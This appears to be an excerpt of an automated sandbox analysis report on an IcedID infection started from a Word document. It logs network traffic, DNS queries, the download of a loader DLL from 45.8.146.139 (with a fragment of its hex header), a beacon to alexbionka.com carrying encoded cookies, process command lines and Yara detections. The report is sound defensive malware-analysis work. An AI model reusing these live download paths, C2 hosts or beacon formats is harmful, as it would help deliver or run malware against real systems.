        Aug 11, 2022 17:27:53.366559982 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366972923 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.472717047 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472764969 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472784042 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472800016 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472817898 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472834110 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472850084 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472867012 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472883940 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472899914 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472909927 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.472924948 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.472942114 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.472959042 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.472979069 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.472995996 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473012924 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473020077 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473030090 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473037004 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473045111 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473053932 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473062038 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473071098 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473078966 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473088026 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473095894 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473103046 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473123074 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473135948 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473181963 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473197937 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473213911 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473218918 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473233938 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473241091 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473251104 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473267078 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473278046 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473283052 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.473294973 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.473306894 CEST804917145.8.146.139192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Aug 11, 2022 17:28:04.715267897 CEST5586853192.168.2.228.8.8.8
        Aug 11, 2022 17:28:04.732486010 CEST53558688.8.8.8192.168.2.22
        Aug 11, 2022 17:28:04.747967958 CEST4968853192.168.2.228.8.8.8
        Aug 11, 2022 17:28:04.775587082 CEST53496888.8.8.8192.168.2.22
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
        Aug 11, 2022 17:28:04.715267897 CEST192.168.2.228.8.8.80xd61cStandard query (0)alexbionka.comA (IP address)IN (0x0001)
        Aug 11, 2022 17:28:04.747967958 CEST192.168.2.228.8.8.80x6557Standard query (0)alexbionka.comA (IP address)IN (0x0001)
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
        Aug 11, 2022 17:28:04.732486010 CEST8.8.8.8192.168.2.220xd61cNo error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)
        Aug 11, 2022 17:28:04.775587082 CEST8.8.8.8192.168.2.220x6557No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)
        • 45.8.146.139
        • alexbionka.com
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.224917145.8.146.13980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Aug 11, 2022 17:27:53.142085075 CEST0OUTGET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 45.8.146.139
        Connection: Keep-Alive
        Aug 11, 2022 17:27:53.262594938 CEST2INHTTP/1.1 200 OK
        Date: Thu, 11 Aug 2022 15:27:53 GMT
        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
        X-Powered-By: PHP/7.2.34
        Content-Description: File Transfer
        Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"
        Expires: 0
        Cache-Control: must-revalidate
        Pragma: public
        Content-Length: 360448
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/octet-stream
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 12 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 07 00 0c 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U4ZZZYZYZZ3ZjXZRichZPEdYb" x`}.textwx `.rdata}|@@.rsrc~@@


        Session IDSource IPSource PortDestination IPDestination PortProcess
        1192.168.2.224917264.227.108.2780C:\Windows\System32\rundll32.exe
        TimestampkBytes transferredDirectionData
        Aug 11, 2022 17:28:05.028685093 CEST379OUTGET / HTTP/1.1
        Connection: Keep-Alive
        Cookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03
        Host: alexbionka.com
        Aug 11, 2022 17:28:05.683288097 CEST379INHTTP/1.1 404 Not Found
        Server: nginx
        Date: Thu, 11 Aug 2022 15:28:05 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
        Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0


        Click to jump to process

        Target ID:0
        Start time:17:27:17
        Start date:11/08/2022
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f220000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Target ID:4
        Start time:17:27:28
        Start date:11/08/2022
        Path:C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
        Imagebase:0x40000
        File size:44544 bytes
        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 0%, Metadefender, Browse
        • Detection: 0%, ReversingLabs
        Reputation:high

        Target ID:5
        Start time:17:27:29
        Start date:11/08/2022
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:"C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
        Imagebase:0xffbd0000
        File size:45568 bytes
        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        Reputation:high

        No disassembly